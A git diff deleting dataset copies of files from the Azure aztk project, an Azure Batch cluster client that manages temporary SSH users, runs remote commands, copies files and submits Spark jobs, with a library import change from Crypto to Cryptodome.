-        for pool in [pool for pool in pools if pool.metadata]:
-            pool_metadata = [(metadata.name, metadata.value) for metadata in pool.metadata]
-            if all([metadata in pool_metadata for metadata in [software_metadata, cluster_metadata]]):
-                aztk_pools.append(pool)
-        return aztk_pools
-
-    def __create_user(self, pool_id: str, node_id: str, username: str, password: str = None, ssh_key: str = None) -> str:
-        """
-        Create a pool user
-        :param pool: the pool to add the user to
-        :param node: the node to add the user to
-        :param username: username of the user to add
-        :param password: password of the user to add
-        :param ssh_key: ssh_key of the user to add
-        """
-        # Create new ssh user for the master node
-        self.batch_client.compute_node.add_user(
-            pool_id,
-            node_id,
-            batch_models.ComputeNodeUser(
-                name=username,
-                is_admin=True,
-                password=password,
-                ssh_public_key=get_ssh_key.get_user_public_key(
-                    ssh_key, self.secrets_config),
-                expiry_time=datetime.now(timezone.utc) + timedelta(days=365)))
-
-    def __delete_user(self, pool_id: str, node_id: str, username: str) -> str:
-        """
-        Create a pool user
-        :param pool: the pool to add the user to
-        :param node: the node to add the user to
-        :param username: username of the user to add
-        """
-        # Delete a user on the given node
-        self.batch_client.compute_node.delete_user(pool_id, node_id, username)
-
-
-    def __get_remote_login_settings(self, pool_id: str, node_id: str):
-        """
-        Get the remote_login_settings for node
-        :param pool_id
-        :param node_id
-        :returns aztk.models.RemoteLogin
-        """
-        result = self.batch_client.compute_node.get_remote_login_settings(
-            pool_id, node_id)
-        return models.RemoteLogin(ip_address=result.remote_login_ip_address, port=str(result.remote_login_port))
-
-    def __create_user_on_node(self, username, pool_id, node_id, ssh_key):
-        try:
-            self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key)
-        except batch_error.BatchErrorException as error:
-            try:
-                self.__delete_user(pool_id, node_id, username)
-                self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key)
-            except batch_error.BatchErrorException as error:
-                print(error)
-                raise error
-        return ssh_key
-
-    def __create_user_on_pool(self, username, pool_id, nodes):
-        ssh_key = RSA.generate(2048)
-        ssh_pub_key = ssh_key.publickey().exportKey('OpenSSH').decode('utf-8')
-        with concurrent.futures.ThreadPoolExecutor() as executor:
-            futures = {executor.submit(self.__create_user_on_node,
-                                       username,
-                                       pool_id,
-                                       node.id,
-                                       ssh_pub_key): node for node in nodes}
-            concurrent.futures.wait(futures)
-        return ssh_key
-
-    def __delete_user_on_pool(self, username, pool_id, nodes):
-        with concurrent.futures.ThreadPoolExecutor() as exector:
-            futures = [exector.submit(self.__delete_user, pool_id, node.id, username) for node in nodes]
-            concurrent.futures.wait(futures)
-
-
-    def __cluster_run(self, cluster_id, command, internal, container_name=None, timeout=None):
-        pool, nodes = self.__get_pool_details(cluster_id)
-        nodes = [node for node in nodes]
-        if internal:
-            cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes]
-        else:
-            cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes]
-        try:
-            ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes)
-            output = asyncio.get_event_loop().run_until_complete(ssh_lib.clus_exec_command(command,
-                                                                 'aztk',
-                                                                 cluster_nodes,
-                                                                 ssh_key=ssh_key.exportKey().decode('utf-8'),
-                                                                 container_name=container_name,
-                                                                 timeout=timeout))
-            return output
-        except OSError as exc:
-            raise exc
-        finally:
-            self.__delete_user_on_pool('aztk', pool.id, nodes)
-
-    def __cluster_copy(self, cluster_id, source_path, destination_path, container_name=None, internal=False, get=False, timeout=None):
-        pool, nodes = self.__get_pool_details(cluster_id)
-        nodes = [node for node in nodes]
-        if internal:
-            cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes]
-        else:
-            cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes]
-        try:
-            ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes)
-            output = asyncio.get_event_loop().run_until_complete(
-                ssh_lib.clus_copy(container_name=container_name,
-                                  username='aztk',
-                                  nodes=cluster_nodes,
-                                  source_path=source_path,
-                                  destination_path=destination_path,
-                                  ssh_key=ssh_key.exportKey().decode('utf-8'),
-                                  get=get,
-                                  timeout=timeout))
-            return output
-        except (OSError, batch_error.BatchErrorException) as exc:
-            raise exc
-        finally:
-            self.__delete_user_on_pool('aztk', pool.id, nodes)
-
-    def __submit_job(self,
-                     job_configuration,
-                     start_task,
-                     job_manager_task,
-                     autoscale_formula,
-                     software_metadata_key: str,
-                     vm_image_model,
-                     application_metadata):
-        """
-        Job Submission
-        :param job_configuration -> aztk_sdk.spark.models.JobConfiguration
-        :param start_task -> batch_models.StartTask
-        :param job_manager_task -> batch_models.TaskAddParameter
-        :param autoscale forumula -> str
-        :param software_metadata_key -> str
-        :param vm_image_model -> aztk_sdk.models.VmImage
-        :returns None
-        """
-        self._get_cluster_data(job_configuration.id).save_cluster_config(job_configuration.to_cluster_config())
-
-        # get a verified node agent sku
-        sku_to_use, image_ref_to_use = \
-            helpers.select_latest_verified_vm_image_with_node_agent_sku(
-                vm_image_model.publisher, vm_image_model.offer, vm_image_model.sku, self.batch_client)
-
-        # set up subnet if necessary
-        network_conf = None
-        if job_configuration.subnet_id:
-            network_conf = batch_models.NetworkConfiguration(
-                subnet_id=job_configuration.subnet_id)
-
-        # set up a schedule for a recurring job
-        auto_pool_specification = batch_models.AutoPoolSpecification(
-            pool_lifetime_option=batch_models.PoolLifetimeOption.job_schedule,
-            auto_pool_id_prefix=job_configuration.id,
-            keep_alive=False,
-            pool=batch_models.PoolSpecification(
-                display_name=job_configuration.id,
-                virtual_machine_configuration=batch_models.VirtualMachineConfiguration(
-                    image_reference=image_ref_to_use,
-                    node_agent_sku_id=sku_to_use),
-                vm_size=job_configuration.vm_size,
-                enable_auto_scale=True,
-                auto_scale_formula=autoscale_formula,
-                auto_scale_evaluation_interval=timedelta(minutes=5),
-                start_task=start_task,
-                enable_inter_node_communication=not job_configuration.mixed_mode(),
-                network_configuration=network_conf,
-                max_tasks_per_node=4,
-                metadata=[
-                    batch_models.MetadataItem(
-                        name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key),
-                    batch_models.MetadataItem(
-                        name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_JOB_MODE_METADATA)
-                ]
-            )
-        )
-
-        # define job specification
-        job_spec = batch_models.JobSpecification(
-            pool_info=batch_models.PoolInformation(auto_pool_specification=auto_pool_specification),
-            display_name=job_configuration.id,
-            on_all_tasks_complete=batch_models.OnAllTasksComplete.terminate_job,
-            job_manager_task=job_manager_task,
-            metadata=[
-                batch_models.MetadataItem(
-                    name='applications', value=application_metadata)
-            ]
-        )
-
-        # define schedule
-        schedule = batch_models.Schedule(
-            do_not_run_until=None,
-            do_not_run_after=None,
-            start_window=None,
-            recurrence_interval=None
-        )
-
-        # create job schedule and add task
-        setup = batch_models.JobScheduleAddParameter(
-            id=job_configuration.id,
-            schedule=schedule,
-            job_specification=job_spec)
-
-        self.batch_client.job_schedule.add(setup)
-
-        return self.batch_client.job_schedule.get(job_schedule_id=job_configuration.id)
-
-
-    '''
-    Define Public Interface
-    '''
-
-    def create_cluster(self, cluster_conf, wait: bool = False):
-        raise NotImplementedError()
-
-    def create_clusters_in_parallel(self, cluster_confs):
-        raise NotImplementedError()
-
-    def delete_cluster(self, cluster_id: str):
-        raise NotImplementedError()
-
-    def get_cluster(self, cluster_id: str):
-        raise NotImplementedError()
-
-    def list_clusters(self):
-        raise NotImplementedError()
-
-    def wait_until_cluster_is_ready(self, cluster_id):
-        raise NotImplementedError()
-
-    def create_user(self, cluster_id: str, username: str, password: str = None, ssh_key: str = None) -> str:
-        raise NotImplementedError()
-
-    def get_remote_login_settings(self, cluster_id, node_id):
-        raise NotImplementedError()
-
-    def cluster_run(self, cluster_id, command):
-        raise NotImplementedError()
-
-    def cluster_copy(self, cluster_id, source_path, destination_path):
-        raise NotImplementedError()
-
-    def cluster_download(self, cluster_id, source_path, destination_path):
-        raise NotImplementedError()
-
-    def submit_job(self, job):
-        raise NotImplementedError()
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py
deleted file mode 100644
index d560b56..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py
+++ /dev/null
@@ -1,401 +0,0 @@
-import asyncio
-import concurrent.futures
-from datetime import datetime, timedelta, timezone
-
-import azure.batch.models as batch_models
-import azure.batch.models.batch_error as batch_error
-import aztk.utils.azure_api as azure_api
-import aztk.utils.constants as constants
-import aztk.utils.get_ssh_key as get_ssh_key
-import aztk.utils.helpers as helpers
-import aztk.utils.ssh as ssh_lib
-import aztk.models as models
-import azure.batch.models as batch_models
-from azure.batch.models import batch_error
-from Cryptodome.PublicKey import RSA
-from aztk.internal import cluster_data
-
-class Client:
-    def __init__(self, secrets_config: models.SecretsConfiguration):
-        self.secrets_config = secrets_config
-
-        azure_api.validate_secrets(secrets_config)
-        self.batch_client = azure_api.make_batch_client(secrets_config)
-        self.blob_client = azure_api.make_blob_client(secrets_config)
-
-    def get_cluster_config(self, cluster_id: str) -> models.ClusterConfiguration:
-        return self._get_cluster_data(cluster_id).read_cluster_config()
-
-    def _get_cluster_data(self, cluster_id: str) -> cluster_data.ClusterData:
-        """
-        Returns ClusterData object to manage data related to the given cluster id
-        """
-        return cluster_data.ClusterData(self.blob_client, cluster_id)
-
-    '''
-    General Batch Operations
-    '''
-
-    def __delete_pool_and_job(self, pool_id: str, keep_logs: bool = False):
-        """
-        Delete a pool and it's associated job
-        :param cluster_id: the pool to add the user to
-        :return bool: deleted the pool if exists and job if exists
-        """
-        # job id is equal to pool id
-        job_id = pool_id
-        job_exists = True
-
-        try:
-            self.batch_client.job.get(job_id)
-        except batch_models.batch_error.BatchErrorException:
-            job_exists = False
-
-        pool_exists = self.batch_client.pool.exists(pool_id)
-
-        if job_exists:
-            self.batch_client.job.delete(job_id)
-
-        if pool_exists:
-            self.batch_client.pool.delete(pool_id)
-
-        if not keep_logs:
-            cluster_data = self._get_cluster_data(pool_id)
-            cluster_data.delete_container(pool_id)
-
-        return job_exists or pool_exists
-
-    def __create_pool_and_job(self, cluster_conf: models.ClusterConfiguration, software_metadata_key: str, start_task, VmImageModel):
-        """
-        Create a pool and job
-        :param cluster_conf: the configuration object used to create the cluster
-        :type cluster_conf: aztk.models.ClusterConfiguration
-        :parm software_metadata_key: the id of the software being used on the cluster
-        :param start_task: the start task for the cluster
-        :param VmImageModel: the type of image to provision for the cluster
-        :param wait: wait until the cluster is ready
-        """
-        self._get_cluster_data(cluster_conf.cluster_id).save_cluster_config(cluster_conf)
-        # reuse pool_id as job_id
-        pool_id = cluster_conf.cluster_id
-        job_id = cluster_conf.cluster_id
-
-        # Get a verified node agent sku
-        sku_to_use, image_ref_to_use = \
-            helpers.select_latest_verified_vm_image_with_node_agent_sku(
-                VmImageModel.publisher, VmImageModel.offer, VmImageModel.sku, self.batch_client)
-
-        network_conf = None
-        if cluster_conf.subnet_id is not None:
-            network_conf = batch_models.NetworkConfiguration(
-                subnet_id=cluster_conf.subnet_id)
-        auto_scale_formula = "$TargetDedicatedNodes={0}; $TargetLowPriorityNodes={1}".format(
-            cluster_conf.vm_count, cluster_conf.vm_low_pri_count)
-
-        # Confiure the pool
-        pool = batch_models.PoolAddParameter(
-            id=pool_id,
-            virtual_machine_configuration=batch_models.VirtualMachineConfiguration(
-                image_reference=image_ref_to_use,
-                node_agent_sku_id=sku_to_use),
-            vm_size=cluster_conf.vm_size,
-            enable_auto_scale=True,
-            auto_scale_formula=auto_scale_formula,
-            auto_scale_evaluation_interval=timedelta(minutes=5),
-            start_task=start_task,
-            enable_inter_node_communication=True if not cluster_conf.subnet_id else False,
-            max_tasks_per_node=4,
-            network_configuration=network_conf,
-            metadata=[
-                batch_models.MetadataItem(
-                    name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key),
-                batch_models.MetadataItem(
-                    name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_CLUSTER_MODE_METADATA)
-            ])
-
-        # Create the pool + create user for the pool
-        helpers.create_pool_if_not_exist(pool, self.batch_client)
-
-        # Create job
-        job = batch_models.JobAddParameter(
-            id=job_id,
-            pool_info=batch_models.PoolInformation(pool_id=pool_id))
-
-        # Add job to batch
-        self.batch_client.job.add(job)
-
-        return helpers.get_cluster(cluster_conf.cluster_id, self.batch_client)
-
-    def __get_pool_details(self, cluster_id: str):
-        """
-        Print the information for the given cluster
-        :param cluster_id: Id of the cluster
-        :return pool: CloudPool, nodes: ComputeNodePaged
-        """
-        pool = self.batch_client.pool.get(cluster_id)
-        nodes = self.batch_client.compute_node.list(pool_id=cluster_id)
-        return pool, nodes
-
-    def __list_clusters(self, software_metadata_key):
-        """
-        List all the cluster on your account.
-        """
-        pools = self.batch_client.pool.list()
-        software_metadata = (
-            constants.AZTK_SOFTWARE_METADATA_KEY, software_metadata_key)
-        cluster_metadata = (
-            constants.AZTK_MODE_METADATA_KEY, constants.AZTK_CLUSTER_MODE_METADATA)
-
-        aztk_pools = []
-        for pool in [pool for pool in pools if pool.metadata]:
-            pool_metadata = [(metadata.name, metadata.value) for metadata in pool.metadata]
-            if all([metadata in pool_metadata for metadata in [software_metadata, cluster_metadata]]):
-                aztk_pools.append(pool)
-        return aztk_pools
-
-    def __create_user(self, pool_id: str, node_id: str, username: str, password: str = None, ssh_key: str = None) -> str:
-        """
-        Create a pool user
-        :param pool: the pool to add the user to
-        :param node: the node to add the user to
-        :param username: username of the user to add
-        :param password: password of the user to add
-        :param ssh_key: ssh_key of the user to add
-        """
-        # Create new ssh user for the master node
-        self.batch_client.compute_node.add_user(
-            pool_id,
-            node_id,
-            batch_models.ComputeNodeUser(
-                name=username,
-                is_admin=True,
-                password=password,
-                ssh_public_key=get_ssh_key.get_user_public_key(
-                    ssh_key, self.secrets_config),
-                expiry_time=datetime.now(timezone.utc) + timedelta(days=365)))
-
-    def __delete_user(self, pool_id: str, node_id: str, username: str) -> str:
-        """
-        Create a pool user
-        :param pool: the pool to add the user to
-        :param node: the node to add the user to
-        :param username: username of the user to add
-        """
-        # Delete a user on the given node
-        self.batch_client.compute_node.delete_user(pool_id, node_id, username)
-
-
-    def __get_remote_login_settings(self, pool_id: str, node_id: str):
-        """
-        Get the remote_login_settings for node
-        :param pool_id
-        :param node_id
-        :returns aztk.models.RemoteLogin
-        """
-        result = self.batch_client.compute_node.get_remote_login_settings(
-            pool_id, node_id)
-        return models.RemoteLogin(ip_address=result.remote_login_ip_address, port=str(result.remote_login_port))
-
-    def __create_user_on_node(self, username, pool_id, node_id, ssh_key):
-        try:
-            self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key)
-        except batch_error.BatchErrorException as error:
-            try:
-                self.__delete_user(pool_id, node_id, username)
-                self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key)
-            except batch_error.BatchErrorException as error:
-                print(error)
-                raise error
-        return ssh_key
-
-    def __create_user_on_pool(self, username, pool_id, nodes):
-        ssh_key = RSA.generate(2048)
-        ssh_pub_key = ssh_key.publickey().exportKey('OpenSSH').decode('utf-8')
-        with concurrent.futures.ThreadPoolExecutor() as executor:
-            futures = {executor.submit(self.__create_user_on_node,
-                                       username,
-                                       pool_id,
-                                       node.id,
-                                       ssh_pub_key): node for node in nodes}
-            concurrent.futures.wait(futures)
-        return ssh_key
-
-    def __delete_user_on_pool(self, username, pool_id, nodes):
-        with concurrent.futures.ThreadPoolExecutor() as exector:
-            futures = [exector.submit(self.__delete_user, pool_id, node.id, username) for node in nodes]
-            concurrent.futures.wait(futures)
-
-
-    def __cluster_run(self, cluster_id, command, internal, container_name=None, timeout=None):
-        pool, nodes = self.__get_pool_details(cluster_id)
-        nodes = [node for node in nodes]
-        if internal:
-            cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes]
-        else:
-            cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes]
-        try:
-            ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes)
-            output = asyncio.get_event_loop().run_until_complete(ssh_lib.clus_exec_command(command,
-                                                                 'aztk',
-                                                                 cluster_nodes,
-                                                                 ssh_key=ssh_key.exportKey().decode('utf-8'),
-                                                                 container_name=container_name,
-                                                                 timeout=timeout))
-            return output
-        except OSError as exc:
-            raise exc
-        finally:
-            self.__delete_user_on_pool('aztk', pool.id, nodes)
-
-    def __cluster_copy(self, cluster_id, source_path, destination_path, container_name=None, internal=False, get=False, timeout=None):
-        pool, nodes = self.__get_pool_details(cluster_id)
-        nodes = [node for node in nodes]
-        if internal:
-            cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes]
-        else:
-            cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes]
-        try:
-            ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes)
-            output = asyncio.get_event_loop().run_until_complete(
-                ssh_lib.clus_copy(container_name=container_name,
-                                  username='aztk',
-                                  nodes=cluster_nodes,
-                                  source_path=source_path,
-                                  destination_path=destination_path,
-                                  ssh_key=ssh_key.exportKey().decode('utf-8'),
-                                  get=get,
-                                  timeout=timeout))
-            return output
-        except (OSError, batch_error.BatchErrorException) as exc:
-            raise exc
-        finally:
-            self.__delete_user_on_pool('aztk', pool.id, nodes)
-
-    def __submit_job(self,
-                     job_configuration,
-                     start_task,
-                     job_manager_task,
-                     autoscale_formula,
-                     software_metadata_key: str,
-                     vm_image_model,
-                     application_metadata):
-        """
-        Job Submission
-        :param job_configuration -> aztk_sdk.spark.models.JobConfiguration
-        :param start_task -> batch_models.StartTask
-        :param job_manager_task -> batch_models.TaskAddParameter
-        :param autoscale forumula -> str
-        :param software_metadata_key -> str
-        :param vm_image_model -> aztk_sdk.models.VmImage
-        :returns None
-        """
-        self._get_cluster_data(job_configuration.id).save_cluster_config(job_configuration.to_cluster_config())
-
-        # get a verified node agent sku
-        sku_to_use, image_ref_to_use = \
-            helpers.select_latest_verified_vm_image_with_node_agent_sku(
-                vm_image_model.publisher, vm_image_model.offer, vm_image_model.sku, self.batch_client)
-
-        # set up subnet if necessary
-        network_conf = None
-        if job_configuration.subnet_id:
-            network_conf = batch_models.NetworkConfiguration(
-                subnet_id=job_configuration.subnet_id)
-
-        # set up a schedule for a recurring job
-        auto_pool_specification = batch_models.AutoPoolSpecification(
-            pool_lifetime_option=batch_models.PoolLifetimeOption.job_schedule,
-            auto_pool_id_prefix=job_configuration.id,
-            keep_alive=False,
-            pool=batch_models.PoolSpecification(
-                display_name=job_configuration.id,
-                virtual_machine_configuration=batch_models.VirtualMachineConfiguration(
-                    image_reference=image_ref_to_use,
-                    node_agent_sku_id=sku_to_use),
-                vm_size=job_configuration.vm_size,
-                enable_auto_scale=True,
-                auto_scale_formula=autoscale_formula,
-                auto_scale_evaluation_interval=timedelta(minutes=5),
-                start_task=start_task,
-                enable_inter_node_communication=not job_configuration.mixed_mode(),
-                network_configuration=network_conf,
-                max_tasks_per_node=4,
-                metadata=[
-                    batch_models.MetadataItem(
-                        name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key),
-                    batch_models.MetadataItem(
-                        name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_JOB_MODE_METADATA)
-                ]
-            )
-        )
-
-        # define job specification
-        job_spec = batch_models.JobSpecification(
batch_models.JobSpecification( - pool_info=batch_models.PoolInformation(auto_pool_specification=auto_pool_specification), - display_name=job_configuration.id, - on_all_tasks_complete=batch_models.OnAllTasksComplete.terminate_job, - job_manager_task=job_manager_task, - metadata=[ - batch_models.MetadataItem( - name='applications', value=application_metadata) - ] - ) - - # define schedule - schedule = batch_models.Schedule( - do_not_run_until=None, - do_not_run_after=None, - start_window=None, - recurrence_interval=None - ) - - # create job schedule and add task - setup = batch_models.JobScheduleAddParameter( - id=job_configuration.id, - schedule=schedule, - job_specification=job_spec) - - self.batch_client.job_schedule.add(setup) - - return self.batch_client.job_schedule.get(job_schedule_id=job_configuration.id) - - - ''' - Define Public Interface - ''' - - def create_cluster(self, cluster_conf, wait: bool = False): - raise NotImplementedError() - - def create_clusters_in_parallel(self, cluster_confs): - raise NotImplementedError() - - def delete_cluster(self, cluster_id: str): - raise NotImplementedError() - - def get_cluster(self, cluster_id: str): - raise NotImplementedError() - - def list_clusters(self): - raise NotImplementedError() - - def wait_until_cluster_is_ready(self, cluster_id): - raise NotImplementedError() - - def create_user(self, cluster_id: str, username: str, password: str = None, ssh_key: str = None) -> str: - raise NotImplementedError() - - def get_remote_login_settings(self, cluster_id, node_id): - raise NotImplementedError() - - def cluster_run(self, cluster_id, command): - raise NotImplementedError() - - def cluster_copy(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def cluster_download(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def submit_job(self, job): - raise NotImplementedError() diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff deleted file mode 100644 index 3572da8..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/aztk/node_scripts/install/create_user.py b/aztk/node_scripts/install/create_user.py - index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644 - --- a/aztk/node_scripts/install/create_user.py - +++ b/aztk/node_scripts/install/create_user.py -@@ -1,8 +1,8 @@ - import os - import azure.batch.models as batch_models - import azure.batch.models.batch_error as batch_error --from Crypto.PublicKey import RSA --from Crypto.Cipher import AES, PKCS1_OAEP -+from Cryptodome.PublicKey import RSA -+from Cryptodome.Cipher import AES, PKCS1_OAEP - from datetime import datetime, timezone, timedelta - import yaml - ''' diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py deleted file mode 100644 index b87f641..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import azure.batch.models as batch_models -import azure.batch.models.batch_error as batch_error -from Crypto.PublicKey import RSA -from Crypto.Cipher import AES, PKCS1_OAEP -from datetime import datetime, timezone, timedelta -import yaml -''' - 
-    Creates a user if the user configuration file at $AZTK_WORKING_DIR/user.yaml exists
-'''
-
-def create_user(batch_client):
-    path = os.path.join(os.environ['AZTK_WORKING_DIR'], "user.yaml")
-
-    if not os.path.isfile(path):
-        print("No user to create.")
-        return
-
-    with open(path, 'r', encoding='UTF-8') as file:
-        user_conf = yaml.load(file.read())
-
-    try:
-        password = None if user_conf['ssh-key'] else decrypt_password(user_conf)
-
-        batch_client.compute_node.add_user(
-            pool_id=os.environ['AZ_BATCH_POOL_ID'],
-            node_id=os.environ['AZ_BATCH_NODE_ID'],
-            user=batch_models.ComputeNodeUser(
-                name=user_conf['username'],
-                is_admin=True,
-                password=password,
-                ssh_public_key=str(user_conf['ssh-key']),
-                expiry_time=datetime.now(timezone.utc) + timedelta(days=365)
-            )
-        )
-    except batch_error.BatchErrorException as e:
-        print(e)
-
-def decrypt_password(user_conf):
-    cipher_text = user_conf['password']
-    encrypted_aes_session_key = user_conf['aes_session_key']
-    cipher_aes_nonce = user_conf['cipher_aes_nonce']
-    tag = user_conf['tag']
-
-    # Read private key
-    with open(os.path.join(os.environ['AZTK_WORKING_DIR'], 'id_rsa'), encoding='UTF-8') as f:
-        private_key = RSA.import_key(f.read())
-    # Decrypt the session key with the public RSA key
-    cipher_rsa = PKCS1_OAEP.new(private_key)
-    session_key = cipher_rsa.decrypt(encrypted_aes_session_key)
-
-    # Decrypt the data with the AES session key
-    cipher_aes = AES.new(session_key, AES.MODE_EAX, cipher_aes_nonce)
-    password = cipher_aes.decrypt_and_verify(cipher_text, tag)
-    return password.decode("utf-8")
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py
deleted file mode 100644
index 204fec8..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py
+++ /dev/null
@@ -1,55 +0,0 @@
-import os
-import azure.batch.models as batch_models
-import azure.batch.models.batch_error as batch_error
-from Cryptodome.PublicKey import RSA
-from Cryptodome.Cipher import AES, PKCS1_OAEP
-from datetime import datetime, timezone, timedelta
-import yaml
-'''
-    Creates a user if the user configuration file at $AZTK_WORKING_DIR/user.yaml exists
-'''
-
-def create_user(batch_client):
-    path = os.path.join(os.environ['AZTK_WORKING_DIR'], "user.yaml")
-
-    if not os.path.isfile(path):
-        print("No user to create.")
-        return
-
-    with open(path, 'r', encoding='UTF-8') as file:
-        user_conf = yaml.load(file.read())
-
-    try:
-        password = None if user_conf['ssh-key'] else decrypt_password(user_conf)
-
-        batch_client.compute_node.add_user(
-            pool_id=os.environ['AZ_BATCH_POOL_ID'],
-            node_id=os.environ['AZ_BATCH_NODE_ID'],
-            user=batch_models.ComputeNodeUser(
-                name=user_conf['username'],
-                is_admin=True,
-                password=password,
-                ssh_public_key=str(user_conf['ssh-key']),
-                expiry_time=datetime.now(timezone.utc) + timedelta(days=365)
-            )
-        )
-    except batch_error.BatchErrorException as e:
-        print(e)
-
-def decrypt_password(user_conf):
-    cipher_text = user_conf['password']
-    encrypted_aes_session_key = user_conf['aes_session_key']
-    cipher_aes_nonce = user_conf['cipher_aes_nonce']
-    tag = user_conf['tag']
-
-    # Read private key
-    with open(os.path.join(os.environ['AZTK_WORKING_DIR'], 'id_rsa'), encoding='UTF-8') as f:
-        private_key = RSA.import_key(f.read())
-    # Decrypt the session key with the public RSA key
-    cipher_rsa = PKCS1_OAEP.new(private_key)
-    session_key = cipher_rsa.decrypt(encrypted_aes_session_key)
-
-    # Decrypt the data with the AES session key
-    cipher_aes = AES.new(session_key, AES.MODE_EAX, cipher_aes_nonce)
-    password = cipher_aes.decrypt_and_verify(cipher_text, tag)
-    return password.decode("utf-8")
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff
deleted file mode 100644
index a4c8aae..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff
+++ /dev/null
@@ -1,11 +0,0 @@
-diff --git a/aztk/spark/models/models.py b/aztk/spark/models/models.py
- index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644
- --- a/aztk/spark/models/models.py
- +++ b/aztk/spark/models/models.py
-@@ -1,5 +1,5 @@
- from typing import List
--from Crypto.PublicKey import RSA
-+from Cryptodome.PublicKey import RSA
- import azure.batch.models as batch_models
- import aztk.models
- from aztk import error
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py
deleted file mode 100644
index d234d75..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py
+++ /dev/null
@@ -1,312 +0,0 @@
-from typing import List
-from Crypto.PublicKey import RSA
-import azure.batch.models as batch_models
-import aztk.models
-from aztk import error
-from aztk.utils import constants, helpers
-
-class SparkToolkit(aztk.models.Toolkit):
-    def __init__(self, version: str, environment: str = None, environment_version: str = None):
-        super().__init__(
-            version=version,
-            environment=environment,
-            environment_version=environment_version,
-        )
-
-
-class Cluster(aztk.models.Cluster):
-    def __init__(self, pool: batch_models.CloudPool = None, nodes: batch_models.ComputeNodePaged = None):
-        super().__init__(pool, nodes)
-        self.master_node_id = self.__get_master_node_id()
-        self.gpu_enabled = helpers.is_gpu_enabled(pool.vm_size)
-
-    def is_pool_running_spark(self, pool: batch_models.CloudPool):
-        if pool.metadata is None:
-            return False
-
-        for metadata in pool.metadata:
-            if metadata.name == constants.AZTK_SOFTWARE_METADATA_KEY:
-                return metadata.value == aztk.models.Software.spark
-
-        return False
-
-    def __get_master_node_id(self):
-        """
-        :returns: the id of the node that is the assigned master of this pool
-        """
-        if self.pool.metadata is None:
-            return None
-
-        for metadata in self.pool.metadata:
-            if metadata.name == constants.MASTER_NODE_METADATA_KEY:
-                return metadata.value
-
-        return None
-
-
-class RemoteLogin(aztk.models.RemoteLogin):
-    pass
-
-
-class File(aztk.models.File):
-    pass
-
-
-class SparkConfiguration():
-    def __init__(self, spark_defaults_conf=None, spark_env_sh=None, core_site_xml=None, jars=None):
-        self.spark_defaults_conf = spark_defaults_conf
-        self.spark_env_sh = spark_env_sh
-        self.core_site_xml = core_site_xml
-        self.jars = jars
-        self.ssh_key_pair = self.__generate_ssh_key_pair()
-
-    def __generate_ssh_key_pair(self):
-        key = RSA.generate(2048)
-        priv_key = key.exportKey('PEM')
-        pub_key = key.publickey().exportKey('OpenSSH')
-        return {'pub_key': pub_key, 'priv_key': priv_key}
-
-
-class CustomScript(aztk.models.CustomScript):
-    pass
-
-
-class FileShare(aztk.models.FileShare):
-    pass
-
-
-class UserConfiguration(aztk.models.UserConfiguration):
-    pass
-
-
-class ServicePrincipalConfiguration(aztk.models.ServicePrincipalConfiguration):
-    pass
-
-
-class SharedKeyConfiguration(aztk.models.SharedKeyConfiguration):
-    pass
-
-
-class DockerConfiguration(aztk.models.DockerConfiguration):
-    pass
-
-class PluginConfiguration(aztk.models.PluginConfiguration):
-    pass
-
-
